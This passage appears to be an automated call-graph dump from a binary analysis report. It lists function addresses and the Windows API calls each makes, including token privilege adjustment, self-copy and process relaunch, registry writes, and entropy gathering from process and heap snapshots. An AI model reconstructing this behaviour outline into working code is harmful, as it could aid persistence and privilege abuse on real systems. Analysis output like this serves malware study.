22146->22147 22149 42483a 22147->22149 22148->22146 22152 42486a 22148->22152 22313 425a62 11 API calls __commit 22149->22313 22151 41d7fa 22151->21955 22152->22151 22153 42570d __commit 66 API calls 22152->22153 22153->22149 22155 41d888 LookupPrivilegeValueA 22154->22155 22156 41e7c8 SetFilePointer ReadFile CloseHandle 22154->22156 22155->21965 22155->21966 22156->22155 22158 41e848 AdjustTokenPrivileges CloseHandle 22157->22158 22159 41e83a 22157->22159 22161 423ebb TranslatorGuardHandler 5 API calls 22158->22161 22160 423ebb TranslatorGuardHandler 5 API calls 22159->22160 22162 41e844 22160->22162 22163 41e890 22161->22163 22162->21966 22163->21966 22165 41dde7 SetLastError 22164->22165 22166 41ddfa GetCurrentProcess OpenProcessToken 22164->22166 22165->21969 22167 41de12 GetLastError 22166->22167 22168 41de1d GetTokenInformation 22166->22168 22169 41de91 22167->22169 22170 41de4a LocalAlloc 22168->22170 22171 41de3c GetLastError 22168->22171 22175 41dea5 22169->22175 22176 41de9b CloseHandle 22169->22176 22173 41de63 GetTokenInformation 22170->22173 22174 41de5c GetLastError 22170->22174 22171->22170 22172 41de43 GetLastError 22171->22172 22172->22169 22177 41de78 GetLastError 22173->22177 22178 41de7f GetSidSubAuthority 22173->22178 22174->22169 22179 41deb3 22175->22179 22180 41dea9 LocalFree 22175->22180 22176->22175 22177->22169 22178->22169 22181 41deb9 SetLastError 22179->22181 22182 41deca 22179->22182 22180->22179 22181->21969 22182->21969 22184 41def0 _memset __write_nolock 22183->22184 22185 421aa0 68 API calls 22184->22185 22186 41df29 PathFindFileNameW 22185->22186 22314 41f000 22186->22314 22189 41e039 22192 423ebb TranslatorGuardHandler 5 API calls 22189->22192 22190 41df8e 22191 41f000 97 API calls 22190->22191 22193 41dfaf _memset 22191->22193 22194 41e04b 22192->22194 22195 41dfc0 CopyFileW 22193->22195 22196 41dfdc CreateProcessW 22193->22196 22194->21972 22195->22193 22196->22195 22197 41e01b 22196->22197 22317 41e050 70 API calls 3 library calls 22197->22317 22199 41e020 22200 423ebb TranslatorGuardHandler 5 API calls 22199->22200 22201 41e035 22200->22201 22201->21972 22356 401a20 RegCreateKeyExW 22202->22356 22204 401bf6 22205 401c11 22204->22205 22369 417900 22204->22369 22393 401900 22205->22393 22209 401c61 22209->21983 22214 41e1e0 22213->22214 22214->22214 22215 41e1eb RegSetValueExW RegFlushKey RegCloseKey RegCreateKeyExW 22214->22215 22216 41e240 22215->22216 22216->22216 22217 41e24b RegSetValueExW RegFlushKey RegCloseKey 22216->22217 22217->21985 22923 424b03 22218->22923 22222 424ce1 22221->22222 22223 424cf4 22221->22223 22225 42570d __commit 66 API calls 22222->22225 22961 424c16 22223->22961 22227 424ce6 22225->22227 22226 424d04 22228 41da42 22226->22228 22230 42570d __commit 66 API calls 22226->22230 22980 425a62 11 API calls __commit 22227->22980 22228->21993 22231 424d26 22228->22231 22230->22228 22232 424d32 __commit 22231->22232 22233 424d45 22232->22233 22235 424d69 22232->22235 22234 42570d __commit 66 API calls 22233->22234 22236 424d4a 22234->22236 23403 4294cd 22235->23403 23439 425a62 11 API calls __commit 22236->23439 22240 424de7 22242 424e10 22240->22242 23409 429ce2 22240->23409 23449 424e28 LeaveCriticalSection LeaveCriticalSection _fprintf 22242->23449 22246 424d55 __commit 22246->21995 22250 424d82 22250->22240 22251 42570d __commit 66 API calls 22250->22251 22252 424ddc 22251->22252 23447 425a62 11 API calls __commit 22252->23447 22255 424f18 __commit 22254->22255 22256 424f2a 22255->22256 22257 424f3f 22255->22257 22258 42570d __commit 66 API calls 22256->22258 22260 4294cd __lock_file 67 API calls 22257->22260 22265 424f3a __commit 22257->22265 22259 424f2f 22258->22259 23479 425a62 11 API calls __commit 22259->23479 22262 424f58 22260->22262 23463 424e9f 22262->23463 22265->21993 22268 41dc6d _memset __write_nolock 22267->22268 22269 42441c __NMSG_WRITE 66 API calls 22268->22269 22270 41dcae 22269->22270 22271 424820 __NMSG_WRITE 66 API calls 22270->22271 22272 41dcc4 CreateFileW 22271->22272 22273 41dcfb WriteFile FlushFileBuffers CloseHandle 22272->22273 22274 41ddbd 22272->22274 22278 42441c __NMSG_WRITE 66 API calls 22273->22278 22275 423ebb TranslatorGuardHandler 5 API calls 22274->22275 22277 41ddca 22275->22277 22277->22000 22279 41dd51 22278->22279 22280 424820 __NMSG_WRITE 66 API calls 22279->22280 22281 41dd67 CreateFileW 22280->22281 22281->22274 22282 41dd90 WriteFile FlushFileBuffers CloseHandle 22281->22282 22282->22274 22284->21945 22285->21947 22286->21949 22287->21951 22288->21978 22289->21982 22294 42442e 22290->22294 22291 424432 22292 42570d __commit 66 API calls 22291->22292 22293 41db1d 22291->22293 22298 42444e 22292->22298 22293->22003 22294->22291 22294->22293 22295 424475 22294->22295 22295->22293 22297 42570d __commit 66 API calls 22295->22297 22297->22298 23519 425a62 11 API calls __commit 22298->23519 22299->22014 22300->21943 22307 427576 22301->22307 22305 427576 __getptd 66 API calls 22304->22305 22306 42532f 22305->22306 22306->22141 22308 4274fd __getptd_noexit 66 API calls 22307->22308 22309 42757e 22308->22309 22311 425322 22309->22311 22312 42524d 66 API calls 3 library calls 22309->22312 22311->22141 22313->22151 22318 424225 22314->22318 22317->22199 22321 424135 22318->22321 22320 41df54 CreateFileW GetLastError CloseHandle 22320->22189 22320->22190 22322 424140 22321->22322 22323 424155 22321->22323 22324 42570d __commit 66 API calls 22322->22324 22325 424166 22323->22325 22327 42418d 22323->22327 22326 424145 22324->22326 22328 42570d __commit 66 API calls 22325->22328 22336 42416b 22325->22336 22352 425a62 11 API calls __commit 22326->22352 22330 42570d __commit 66 API calls 22327->22330 22349 424182 22328->22349 22332 424192 22330->22332 22331 424150 22331->22320 22334 4241c9 22332->22334 22335 42419f 22332->22335 22354 42403f 97 API calls 2 library calls 22334->22354 22353 42403f 97 API calls 2 library calls 22335->22353 22336->22320 22339 4241d7 22341 4241ff 22339->22341 22344 4241ec 22339->22344 22340 4241ae 22340->22341 22342 4241b6 22340->22342 22341->22336 22347 42570d __commit 66 API calls 22341->22347 22343 42570d __commit 66 API calls 22342->22343 22345 4241bb 22343->22345 22346 42570d __commit 66 API calls 22344->22346 22345->22336 22350 42570d __commit 66 API calls 22345->22350 22348 4241f1 22346->22348 22347->22349 22348->22336 22351 42570d __commit 66 API calls 22348->22351 22355 425a62 11 API calls __commit 22349->22355 22350->22336 22351->22336 22352->22331 22353->22340 22354->22339 22355->22336 22357 401af3 RegCreateKeyExW RegQueryValueExW 22356->22357 22358 401a69 RegQueryValueExW 22356->22358 22360 401b30 22357->22360 22361 401b7a 22357->22361 22358->22357 22359 401a87 22358->22359 22363 402de0 97 API calls 22359->22363 22364 401b56 RegSetValueExW RegFlushKey 22360->22364 22450 41ae10 22360->22450 22466 402de0 22361->22466 22366 401adb RegCloseKey 22363->22366 22364->22361 22366->22204 22367 401b53 22367->22364 22370 417933 22369->22370 22372 41798a 22370->22372 22374 41796f 22370->22374 22556 40e8b0 22370->22556 22373 40e8b0 66 API calls 22372->22373 22372->22374 22375 417a9a 22372->22375 22373->22375 22374->22205 22375->22374 22376 40e8b0 66 API calls 22375->22376 22379 417baf 22375->22379 22376->22379 22379->22374 22380 417c93 22379->22380 22528 418190 22379->22528 22380->22374 22532 418a50 22380->22532 22381 417cff 22381->22374 22382 40e8b0 66 API calls 22381->22382 22383 417d4b 22381->22383 22382->22383 22383->22374 22384 40e8b0 66 API calls 22383->22384 22385 417e6f 22383->22385 22384->22385 22385->22374 22386 40e8b0 66 API calls 22385->22386 22391 417fa4 22385->22391 22386->22391 22390 4180a3 22390->22374 22560 418820 66 API calls _memmove 22390->22560 22391->22374 22537 40ea20 22391->22537 22394 401931 _memset 22393->22394 22727 402dc0 22394->22727 22396 401961 _memset 22397 4019ca RegCreateKeyExW RegQueryValueExW RegCloseKey 22396->22397 22398 423ebb TranslatorGuardHandler 5 API calls 22397->22398 22399 401a18 22398->22399 22399->22209 22400 402030 22399->22400 22401 4020b3 22400->22401 22402 418a50 66 API calls 22401->22402 22403 4020d5 22402->22403 22730 4182b0 22403->22730 22405 4020e3 22406 418a50 66 API calls 22405->22406 22407 4020f3 _memset 22406->22407 22734 40ea80 22407->22734 22409 402188 22412 4021bf 22409->22412 22819 419090 67 API calls 2 library calls 22409->22819 22411 40220c 22738 4183d0 22411->22738 22412->22411 22820 414cd0 22412->22820 22415 40222e 22416 40e920 66 API calls 22415->22416 22418 40224b 22415->22418 22416->22418 22417 40ea80 66 API calls 22419 40229c 22417->22419 22418->22417 22420 40ea80 66 API calls 22419->22420 22421 4022ac 22420->22421 22422 40ea80 66 API calls 22421->22422 22423 402328 22422->22423 22742 412640 22423->22742 22425 402356 22749 424296 22425->22749 22428 424005 _free 66 API calls 22429 402380 22428->22429 22758 41f020 22429->22758 22431 40243d _memset 22432 41f020 5 API calls 22431->22432 22433 4024af 22432->22433 22434 41f020 5 API calls 22433->22434 22435 4024c7 22434->22435 22766 401270 22435->22766 22439 40253a ctype _memmove 22817 42434b GetSystemTimeAsFileTime 22439->22817 22441 402585 ctype 22442 423ebb TranslatorGuardHandler 5 API calls 22441->22442 22443 401c5c 22442->22443 22444 401840 22443->22444 22445 40186e _memset 22444->22445 22446 402dc0 97 API calls 22445->22446 22447 401889 RegCreateKeyExW RegSetValueExW RegFlushKey RegCloseKey 22446->22447 22448 423ebb TranslatorGuardHandler 5 API calls 22447->22448 22449 4018f8 22448->22449 22449->22209 22451 41ae50 22450->22451 22452 41ae39 22450->22452 22457 41ae89 22451->22457 22469 41b2c0 GetVersionExW LoadLibraryW LoadLibraryW LoadLibraryW 22451->22469 22453 423ebb TranslatorGuardHandler 5 API calls 22452->22453 22454 41ae4c 22453->22454 22454->22367 22459 41af1d _memset 22457->22459 22518 41aab0 66 API calls 2 library calls 22457->22518 22460 41b158 22459->22460 22519 419db0 66 API calls 22459->22519 22520 419db0 66 API calls 22460->22520 22462 41b166 _memset 22462->22452 22463 41b1e8 22462->22463 22464 423ebb TranslatorGuardHandler 5 API calls 22463->22464 22465 41b1f8 22464->22465 22465->22367 22467 424225 __strftime_l 97 API calls 22466->22467 22468 401bce RegCloseKey 22467->22468 22468->22204 22470 41b331 GetProcAddress GetProcAddress 22469->22470 22471 41b413 22469->22471 22472 41b355 22470->22472 22473 41b40c FreeLibrary 22470->22473 22474 41b51c 22471->22474 22475 41b41f GetProcAddress GetProcAddress GetProcAddress 22471->22475 22472->22473 22478 41b35d NetStatisticsGet 22472->22478 22473->22471 22476 41b524 12 API calls 22474->22476 22477 41b859 22474->22477 22479 41b511 FreeLibrary 22475->22479 22491 41b451 22475->22491 22480 41b852 FreeLibrary 22476->22480 22481 41b5c2 22476->22481 22521 41b900 22477->22521 22483 41b3b5 NetStatisticsGet 22478->22483 22486 41b373 22478->22486 22479->22474 22480->22477 22481->22480 22493 41b624 CreateToolhelp32Snapshot 22481->22493 22483->22473 22488 41b3cd 22483->22488 22486->22483 22487 41b8b8 22490 423ebb TranslatorGuardHandler 5 API calls 22487->22490 22488->22473 22489 41b875 GetCurrentProcessId 22489->22487 22492 41b8fb 22490->22492 22491->22479 22492->22457 22493->22480 22494 41b636 22493->22494 22495 41b656 Heap32ListFirst 22494->22495 22496 41b64a GetTickCount 22494->22496 22497 41b6f9 22495->22497 22510 41b668 22495->22510 22496->22495 22498 41b713 Process32First 22497->22498 22499 41b70b GetTickCount 22497->22499 22500 41b75e 22498->22500 22504 41b728 22498->22504 22499->22498 22503 41b770 GetTickCount 22500->22503 22511 41b778 22500->22511 22501 41b67d Heap32First 22502 41b6dd Heap32ListNext 22501->22502 22501->22510 22502->22497 22505 41b6ef GetTickCount 22502->22505 22503->22511 22504->22500 22509 41b758 GetTickCount 22504->22509 22505->22497 22505->22510 22506 41b6c5 Heap32Next 22506->22510 22507 41b7c3 22508 41b7d5 GetTickCount 22507->22508 22516 41b7dd 22507->22516 22508->22516 22509->22500 22509->22504 22510->22501 22510->22502 22510->22506 22511->22507 22515 41b7bd GetTickCount 22511->22515 22512 41b836 22513 41b847 CloseHandle 22512->22513 22514 41b83e 22512->22514 22513->22480 22514->22480 22515->22507 22515->22511 22516->22512 22517 41b830 GetTickCount 22516->22517 22517->22512 22517->22516 22518->22457 22519->22459 22520->22462 22522 41b95d GetTickCount 22521->22522 22523 41b90f QueryPerformanceCounter 22521->22523 22525 41b96f 22522->22525 22524 41b91d 22523->22524 22527 41b924 22523->22527 22524->22522 22526 41b85e GlobalMemoryStatus 22525->22526 22526->22489 22527->22522 22527->22526 22529 4181a2 22528->22529 22530 4181f6 22529->22530 22561 414780 22529->22561 22530->22380 22533 418a5b 22532->22533 22534 418a60 22532->22534 22533->22381 22534->22533 22716 421990 22534->22716 22535 418aad 22535->22381 22538 40ea34 22537->22538 22539 40ea2d 22537->22539 22538->22374 22541 418740 22538->22541 22540 40e8b0 66 API calls 22539->22540 22540->22538 22542 418799 22541->22542 22543 41874d 22541->22543 22542->22390 22544 418a50 66 API calls 22543->22544 22547 418758 22543->22547 22544->22547 22545 418788 22548 40e920 66 API calls 22545->22548 22546 41879f 22549 40e8b0 66 API calls 22546->22549 22550 418792 22546->22550 22547->22542 22547->22545 22547->22546 22548->22550 22549->22550 22550->22542 22551 4187e3 22550->22551 22552 4187ce 22550->22552 22554 40e8b0 66 API calls 22551->22554 22555 4187d8 22551->22555 22553 40e920 66 API calls 22552->22553 22553->22555 22554->22555 22555->22390 22557 40e8be 22556->22557 22559 40e8c4 22556->22559 22719 40e7d0 22557->22719 22559->22372 22560->22374 22562 41479e 22561->22562 22563 4147d9 22562->22563 22569 40fa10 22562->22569 22563->22530 22565 4147fa 22565->22563 22598 40f350 66 API calls 22565->22598 22567 414822 22567->22563 22599 4151c0 67 API calls 22567->22599 22570 40fa2e 22569->22570 22573 40fa3f 22569->22573 22570->22573 22665 40cf20 66 API calls _memmove 22570->22665 22572 40fa76 22572->22565 22573->22572 22574 40fa88 22573->22574 22575 40e8b0 66 API calls 22573->22575 22600 40e920 22574->22600 22575->22574 22577 40fb38 22604 40ed70 22577->22604 22578 40fac1 22578->22572 22578->22577 22579 40e8b0 66 API calls 22578->22579 22579->22577 22581 40fb65 22581->22572 22610 40d820 22581->22610 22583 40fbae 22583->22572 22666 412930 22583->22666 22585 40fbc6 22585->22572 22586 40fbea 22585->22586 22587 40fbdb 22585->22587 22589 40ea20 66 API calls 22586->22589 22672 413230 66 API calls 22587->22672 22590 40fbe5 22589->22590 22590->22572 22673 40d190 22590->22673 22592 40fc11 22592->22572 22593 40ea20 66 API calls 22592->22593 22594 40fc53 22593->22594 22594->22572 22595 40ed70 67 API calls 22594->22595 22596 40fc65 22595->22596 22596->22572 22597 40d190 67 API calls 22596->22597 22597->22572 22598->22567 22599->22563 22601 40e93a 22600->22601 22603 40e942 22600->22603 22602 40e8b0 66 API calls 22601->22602 22601->22603 22602->22603 22603->22578 22605 40ed8d 22604->22605 22606 40ede4 _allshl 22605->22606 22607 40e8b0 66 API calls 22605->22607 22609 40eda2 22605->22609 22606->22581 22607->22609 22608 40edb8 22608->22581 22609->22606 22609->22608 22611 40df38 22610->22611 22612 40d849 22610->22612 22713 40df50 67 API calls 22611->22713 22612->22611 22614 40d853 22612->22614 22616 40d86b 22614->22616 22709 40cf20 66 API calls _memmove 22614->22709 22615 40df44 22615->22583 22705 40cec0 22616->22705 22620 40cec0 66 API calls 22621 40d88b 22620->22621 22622 40cec0 66 API calls 22621->22622 22623 40d894 22622->22623 22624 40cec0 66 API calls 22623->22624 22625 40d89d 22624->22625 22626 40cec0 66 API calls 22625->22626 22627 40d8a4 22626->22627 22628 40cec0 66 API calls 22627->22628 22629 40d8ad 22628->22629 22630 40cec0 66 API calls 22629->22630 22632 40d8b6 22630->22632 22631 40dea4 22631->22583 22632->22631 22633 40e8b0 66 API calls 22632->22633 22635 40d8e4 22632->22635 22633->22635 22634 40d92b 22637 40e920 66 API calls 22634->22637 22635->22634 22636 40e8b0 66 API calls 22635->22636 22636->22634 22638 40d965 22637->22638 22638->22631 22639 40e920 66 API calls 22638->22639 22640 40d97e 22639->22640 22640->22631 22641 40d190 67 API calls 22640->22641 22643 40d9b6 22640->22643 22641->22643 22642 40db6f 22646 40de55 22642->22646 22712 403210 66 API calls 22642->22712 22643->22631 22657 40db74 22643->22657 22658 40da0c 22643->22658 22645 40ea20 66 API calls 22645->22657 22646->22631 22647 40dea9 22646->22647 22651 40de99 22646->22651 22648 40d190 67 API calls 22647->22648 22648->22631 22649 403210 66 API calls 22649->22657 22650 40d190 67 API calls 22650->22657 22653 40e920 66 API calls 22651->22653 22652 4126f0 66 API calls 22652->22657 22653->22631 22654 4127e0 66 API calls 22654->22658 22655 40ee80 _aullshr 22655->22658 22656 402f20 66 API calls 22656->22658 22657->22631 22657->22642 22657->22645 22657->22649 22657->22650 22657->22652 22660 402e80 66 API calls 22657->22660 22661 40e920 66 API calls 22657->22661 22663 412930 67 API calls 22657->22663 22711 413330 66 API calls 22657->22711 22658->22631 22658->22642 22658->22654 22658->22655 22658->22656 22662 412a80 66 API calls 22658->22662 22710 403010 66 API calls 22658->22710 22660->22657 22661->22657 22662->22658 22663->22657 22665->22573 22667 412967 22666->22667 22669 412963 22666->22669 22668 40e8b0 66 API calls 22667->22668 22668->22669 22670 4129f6 _aullshr 22669->22670 22671 412974 _memset 22669->22671 22670->22669 22670->22671 22671->22585 22672->22590 22674 40d1b5 22673->22674 22675 40d22e 22674->22675 22678 40d1f6 22674->22678 22703 40d21f 22674->22703 22676 40d246 22675->22676 22714 40cf20 66 API calls _memmove 22675->22714 22679 40cec0 66 API calls 22676->22679 22680 40d204 22678->22680 22682 40e920 66 API calls 22678->22682 22681 40d25d 22679->22681 22684 40ea20 66 API calls 22680->22684 22680->22703 22683 40cec0 66 API calls 22681->22683 22682->22680 22685 40d266 22683->22685 22684->22703 22686 40cec0 66 API calls 22685->22686 22687 40d271 22686->22687 22688 40cec0 66 API calls 22687->22688 22689 40d282 22687->22689 22688->22689 22690 412930 67 API calls 22689->22690 22689->22703 22691 40d2d4 22690->22691 22692 412930 67 API calls 22691->22692 22691->22703 22693 40d2f8 22692->22693 22694 40d36f 22693->22694 22695 40d31f 22693->22695 22696 40d327 22693->22696 22693->22703 22694->22696 22697 40e8b0 66 API calls 22694->22697 22695->22696 22698 40e8b0 66 API calls 22695->22698 22699 40e8b0 66 API calls 22696->22699 22700 40d428 22696->22700 22696->22703 22697->22696 22698->22696 22699->22700 22701 40e8b0 66 API calls 22700->22701 22700->22703 22704 40d464 22700->22704 22701->22704 22703->22592 22704->22703 22715 412a80 66 API calls 22704->22715 22706 40cec7 22705->22706 22708 40ceda 22705->22708 22707 40e8b0 66 API calls 22706->22707 22706->22708 22707->22708 22708->22620 22709->22616 22710->22658 22711->22657 22712->22646 22713->22615 22714->22676 22715->22703 22718 424b82 66 API calls 22716->22718 22717 42199d 22717->22535 22718->22717 22720 40e7ec 22719->22720 22722 40e7e3 22719->22722 22720->22722 22723 4219b0 22720->22723 22722->22559 22722->22722 22724 4219c3 22723->22724 22726 421990 66 API calls 22724->22726 22725 4219f3 22725->22722 22726->22725 22728 424225 __strftime_l 97 API calls 22727->22728 22729 402dda 22728->22729 22729->22396 22731 4182b6 22730->22731 22732 417900 69 API calls 22731->22732 22733 4182d4 22731->22733 22732->22733 22733->22405 22735 40ea97 22734->22735 22736 40e8b0 66 API calls 22735->22736 22737 40eab8 22735->22737 22736->22737 22737->22409 22740 4183df 22738->22740 22739 418a50 66 API calls 22741 418428 22739->22741 22740->22739 22740->22741 22741->22415 22743 412662 22742->22743 22744 41265a 22742->22744 22745 4219b0 66 API calls 22743->22745 22744->22425 22746 412667 22745->22746 22747 412697 _aullshr 22746->22747 22748 4126e2 22746->22748 22747->22746 22748->22425 22753 4242a8 22749->22753 22750 4242ac 22751 42570d __commit 66 API calls 22750->22751 22752 40237a 22750->22752 22757 4242c8 22751->22757 22752->22428 22753->22750 22753->22752 22755 4242ea 22753->22755 22755->22752 22756 42570d __commit 66 API calls 22755->22756 22756->22757 22834 425a62 11 API calls __commit 22757->22834 22759 41f03a _memset 22758->22759 22835 41f0c0 22759->22835 22761 41f097 22842 41f1b0 22761->22842 22763 41f0a4 22764 423ebb TranslatorGuardHandler 5 API calls 22763->22764 22765 41f0b2 22764->22765 22765->22431 22852 4010a0 22766->22852 22769 401302 22773 40e7d0 66 API calls 22769->22773 22784 40139e 22769->22784 22770 40e7d0 66 API calls 22772 4012f5 22770->22772 22772->22769 22775 4014d2 22772->22775 22776 401391 22773->22776 22774 401415 22863 401190 79 API calls 2 library calls 22774->22863 22865 402960 78 API calls 2 library calls 22775->22865 22778 401534 22776->22778 22776->22784 22868 402960 78 API calls 2 library calls 22778->22868 22781 40145e 22801 4014b6 22781->22801 22864 402850 77 API calls 3 library calls 22781->22864 22782 401554 22869 423f52 66 API calls std::exception::_Copy_str 22782->22869 22783 4014f2 22866 423f52 66 API calls std::exception::_Copy_str 22783->22866 22862 402e20 77 API calls std::_Xinvalid_argument 22784->22862 22787 401519 22867 4254eb RaiseException 22787->22867 22789 401578 22870 4254eb RaiseException 22789->22870 22790 4016a0 22810 4016c4 ctype 22790->22810 22872 4027b0 77 API calls std::_Xinvalid_argument 22790->22872 22793 40d190 67 API calls 22793->22801 22795 4016d7 22873 402960 78 API calls 2 library calls 22795->22873 22797 40e920 66 API calls 22797->22801 22798 4016fb 22874 423f52 66 API calls std::exception::_Copy_str 22798->22874 22799 401734 22876 402960 78 API calls 2 library calls 22799->22876 22801->22790 22801->22793 22801->22795 22801->22797 22801->22799 22871 4027b0 77 API calls std::_Xinvalid_argument 22801->22871 22803 401758 22877 423f52 66 API calls std::exception::_Copy_str 22803->22877 22805 40171f 22875 4254eb RaiseException 22805->22875 22808 40177c 22878 4254eb RaiseException 22808->22878 22811 423ebb TranslatorGuardHandler 5 API calls 22810->22811 22812 40183b 22811->22812 22813 402740 22812->22813 22814 40277e 22813->22814 22816 402744 ctype 22813->22816 22814->22439 22815 40276c memmove 22815->22814 22816->22814 22816->22815 22818 42437b __aulldiv 22817->22818 22818->22441 22819->22412 22822 414ce8 22820->22822 22821 414cfa 22821->22411 22822->22821 22882 40ce50 22822->22882 22825 40cec0 66 API calls 22826 414d7a 22825->22826 22827 40cec0 66 API calls 22826->22827 22828 414d85 22827->22828 22828->22821 22886 418be0 22828->22886 22830 414da1 _memset 22830->22821 22891 40eb90 22830->22891 22832 414dfd _memset 22832->22821 22833 40eb90 _aullshr 22832->22833 22833->22821 22834->22752 22837 41f0d8 _memmove 22835->22837 22839 41f17a _memmove 22835->22839 22836 41f143 _memset 22836->22839 22849 41f490 5 API calls TranslatorGuardHandler 22836->22849 22837->22836 22840 41f105 _memmove 22837->22840 22848 41f490 5 API calls TranslatorGuardHandler 22837->22848 22839->22761 22840->22761 22843 41f1eb _memset 22842->22843 22844 41f1c8 _memset 22842->22844 22851 41f490 5 API calls TranslatorGuardHandler 22843->22851 22850 41f490 5 API calls TranslatorGuardHandler 22844->22850 22847 41f245 _memset 22847->22763 22848->22836 22849->22839 22850->22843 22851->22847 22853 4010d1 22852->22853 22854 401130 22853->22854 22879 402960 78 API calls 2 library calls 22853->22879 22856 423ebb TranslatorGuardHandler 5 API calls 22854->22856 22858 401149 22856->22858 22857 4010f4 22880 423f52 66 API calls std::exception::_Copy_str 22857->22880 22858->22769 22858->22770 22860 40111b 22881 4254eb RaiseException 22860->22881 22862->22774 22863->22781 22864->22801 22865->22783 22866->22787 22867->22778 22868->22782 22869->22789 22870->22801 22871->22801 22872->22790 22873->22798 22874->22805 22875->22799 22876->22803 22877->22808 22878->22810 22879->22857 22880->22860 22881->22854 22883 40ce57 22882->22883 22885 40ce69 22882->22885 22883->22885 22895 40cf20 66 API calls _memmove 22883->22895 22885->22825 22887 418bf0 22886->22887 22888 418bec 22886->22888 22887->22888 22896 415bc0 22887->22896 22888->22830 22889 418c04 22889->22830 22892 40eba9 22891->22892 22893 40ec00 _aullshr 22892->22893 22894 40ec19 22892->22894 22893->22892 22893->22894 22894->22832 22895->22885 22897 415be2 22896->22897 22898 415bf4 22897->22898 22902 415c2b 22897->22902 22920 40cf20 66 API calls _memmove 22897->22920 22898->22889 22900 40cec0 66 API calls 22901 415c42 22900->22901 22903 40cec0 66 API calls 22901->22903 22902->22900 22904 415c4b 22903->22904 22905 40cec0 66 API calls 22904->22905 22906 415c54 22905->22906 22907 40cec0 66 API calls 22906->22907 22908 415c5d 22907->22908 22909 415d53 22908->22909 22911 415ccf 22908->22911 22913 415cc3 22908->22913 22910 40d820 68 API calls 22909->22910 22912 415d63 22910->22912 22911->22889 22912->22911 22918 415d79 22912->22918 22921 40f250 67 API calls 22912->22921 22913->22911 22914 415d28 22913->22914 22916 40e920 66 API calls 22913->22916 22914->22911 22917 40e920 66 API calls 22914->22917 22916->22914 22917->22911 22918->22911 22922 40f100 67 API calls 22918->22922 22920->22902 22921->22918 22922->22911 22926 424a17 22923->22926 22925 41d995 22925->21988 22927 424a22 22926->22927 22930 424a37 22926->22930 22928 42570d __commit 66 API calls 22927->22928 22929 424a27 22928->22929 22957 425a62 11 API calls __commit 22929->22957 22931 424a48 22930->22931 22934 424a6f 22930->22934 22932 42570d __commit 66 API calls 22931->22932 22956 424a4d 22931->22956 22935 424a64 22932->22935 22936 42570d __commit 66 API calls 22934->22936 22960 425a62 11 API calls __commit 22935->22960 22938 424a74 22936->22938 22937 424a32 22937->22925 22939 424a81 22938->22939 22940 424aab 22938->22940 22958 42494d 97 API calls 2 library calls 22939->22958 22959 42494d 97 API calls 2 library calls 22940->22959 22944 424ab9 22946 424adf 22944->22946 22948 424acc 22944->22948 22945 424a90 22945->22946 22947 424a98 22945->22947 22953 42570d __commit 66 API calls 22946->22953 22946->22956 22949 42570d __commit 66 API calls 22947->22949 22950 42570d __commit 66 API calls 22948->22950 22951 424a9d 22949->22951 22952 424ad1 22950->22952 22954 42570d __commit 66 API calls 22951->22954 22951->22956 22955 42570d __commit 66 API calls 22952->22955 22952->22956 22953->22935 22954->22956 22955->22956 22956->22925 22957->22937 22958->22945 22959->22944 22960->22956 22963 424c22 __commit 22961->22963 22962 424c35 22964 42570d __commit 66 API calls 22962->22964 22963->22962 22965 424c63 22963->22965 22966 424c3a 22964->22966 22981 429864 22965->22981 23018 425a62 11 API calls __commit 22966->23018 22969 424c68 22970 424c6f 22969->22970 22971 424c7c 22969->22971 22972 42570d __commit 66 API calls 22970->22972 22973 424ca4 22971->22973 22974 424c84 22971->22974 22975 424c45 __commit @_EH4_CallFilterFunc@8 22972->22975 22998 4295ab 22973->22998 22976 42570d __commit 66 API calls 22974->22976 22975->22226 22976->22975 22980->22228 22982 429870 __commit 22981->22982 23020 42a4bb 22982->23020 22984 42987e 22985 4298fa 22984->22985 22996 4298f3 22984->22996 23030 42a3f9 22984->23030 23057 42950e 67 API calls __lock 22984->23057 23058 42957c LeaveCriticalSection LeaveCriticalSection _doexit 22984->23058 22987 42bb11 __malloc_crt 66 API calls 22985->22987 22989 429901 22987->22989 22988 429983 __commit 22988->22969 22990 42990f InitializeCriticalSectionAndSpinCount 22989->22990 22989->22996 22991 429942 EnterCriticalSection 22990->22991 22992 42992f 22990->22992 22991->22996 22995 424005 _free 66 API calls 22992->22995 22995->22996 23027 42998e 22996->23027 22999 4295cd 22998->22999 23000 4295e8 22999->23000 23012 4295ff __wopenfile 22999->23012 23001 42570d __commit 66 API calls 23000->23001 23003 4295ed 23001->23003 23002 4297b4 23005 42981f 23002->23005 23006 42980d 23002->23006 23068 425a62 11 API calls __commit 23003->23068 23065 42d6f4 23005->23065 23007 42570d __commit 66 API calls 23006->23007 23010 429812 23007->23010 23009 424caf 23019 424cca LeaveCriticalSection LeaveCriticalSection _fprintf 23009->23019 23072 425a62 11 API calls __commit 23010->23072 23012->23002 23012->23006 23012->23012 23069 42d7f9 78 API calls 2 library calls 23012->23069 23014 4297ad 23014->23002 23070 42d7f9 78 API calls 2 library calls 23014->23070 23016 4297cc 23016->23002 23071 42d7f9 78 API calls 2 library calls 23016->23071 23018->22975 23019->22975 23021 42a4e3 EnterCriticalSection 23020->23021 23022 42a4d0 23020->23022 23021->22984 23023 42a3f9 __mtinitlocknum 65 API calls 23022->23023 23024 42a4d6 23023->23024 23024->23021 23059 42524d 66 API calls 3 library calls 23024->23059 23060 42a3e2 LeaveCriticalSection 23027->23060 23029 429995 23029->22988 23031 42a405 __commit 23030->23031 23032 42a415 23031->23032 23033 42a42d 23031->23033 23061 4293bd 66 API calls __NMSG_WRITE 23032->23061 23036 42bb11 __malloc_crt 65 API calls 23033->23036 23039 42a43b __commit 23033->23039 23035 42a41a 23062 42920e 66 API calls 7 library calls 23035->23062 23038 42a446 23036->23038 23041 42a45c 23038->23041 23042 42a44d 23038->23042 23039->22984 23040 42a421 23063 424fab GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 23040->23063 23043 42a4bb __lock 65 API calls 23041->23043 23045 42570d __commit 65 API calls 23042->23045 23046 42a463 23043->23046 23045->23039 23048 42a496 23046->23048 23049 42a46b InitializeCriticalSectionAndSpinCount 23046->23049 23052 424005 _free 65 API calls 23048->23052 23050 42a487 23049->23050 23051 42a47b 23049->23051 23064 42a4b2 LeaveCriticalSection _doexit 23050->23064 23053 424005 _free 65 API calls 23051->23053 23052->23050 23054 42a481 23053->23054 23056 42570d __commit 65 API calls 23054->23056 23056->23050 23057->22984 23058->22984 23060->23029 23061->23035 23062->23040 23064->23039 23073 42d630 23065->23073 23067 42d70f 23067->23009 23068->23009 23069->23014 23070->23016 23071->23002 23072->23009 23074 42d63c __commit 23073->23074 23075 42d64f 23074->23075 23078 42d685 23074->23078 23076 42570d __commit 